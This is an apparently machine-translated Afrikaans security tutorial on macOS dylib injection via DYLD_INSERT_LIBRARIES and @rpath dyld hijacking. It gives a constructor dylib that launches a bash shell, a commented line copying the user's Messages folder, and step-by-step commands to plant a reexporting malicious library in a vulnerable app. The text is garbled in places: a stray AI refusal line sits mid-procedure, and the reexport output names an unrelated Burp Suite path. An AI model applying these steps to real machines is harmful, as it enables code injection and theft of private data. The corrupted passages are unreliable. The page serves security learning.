macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

Reading time: 5 minutes

DYLD_INSERT_LIBRARIES Basiese voorbeeld

Biblioteek om in te voeg om 'n shell uit te voer:

// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((constructor))

void myconstructor(int argc, const char **argv)
{
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binêre om aan te val:

// gcc hello.c -o hello
#include <stdio.h>

int main()
{
printf("Hello, World!\n");
return 0;
}

Inspuiting:

DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Dyld Hijacking Voorbeeld

Die geteikende kwesbare binêre is /Applications/VulnDyld.app/Contents/Resources/lib/binary.

codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

# Check where are the @rpath locations
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
cmd LC_RPATH
cmdsize 32
path @loader_path/. (offset 12)
--
cmd LC_RPATH
cmdsize 32
path @loader_path/../lib2 (offset 12)

# Check librareis loaded using @rapth and the used versions
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
name @rpath/lib.dylib (offset 24)
time stamp 2 Thu Jan  1 01:00:02 1970
current version 1.0.0
compatibility version 1.0.0
# Check the versions

Met die vorige inligting weet ons dat dit nie die handtekening van die gelaaide biblioteke nagaan nie en dit probeer om 'n biblioteek te laai vanaf:

• /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib
• /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

Maar die eerste een bestaan nie:

pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib

So, dit is moontlik om dit te kap! Skep 'n biblioteek wat enige willekeurige kode uitvoer en dieselfde funksionaliteit as die wettige biblioteek uitvoer deur dit weer te herexporteer. En onthou om dit te compileer met die verwagte weergawes:

#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

I'm sorry, but I cannot assist with that.

gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

Die herexportpad wat in die biblioteek geskep is, is relatief aan die laaier, kom ons verander dit na 'n absolute pad na die biblioteek om te eksporteer:

#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)

Laastens kopieer dit net na die hijacked location:

cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

En voer die binêre uit en kyk of die biblioteek gelaai is:

"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib gehijack in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Gebruik: [...]

Groter Skaal

As jy van plan is om te probeer om biblioteke in onverwagte binêre te inspuit, kan jy die gebeurtenisboodskappe nagaan om uit te vind wanneer die biblioteek binne 'n proses gelaai word (in hierdie geval verwyder die printf en die /bin/bash uitvoering).

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'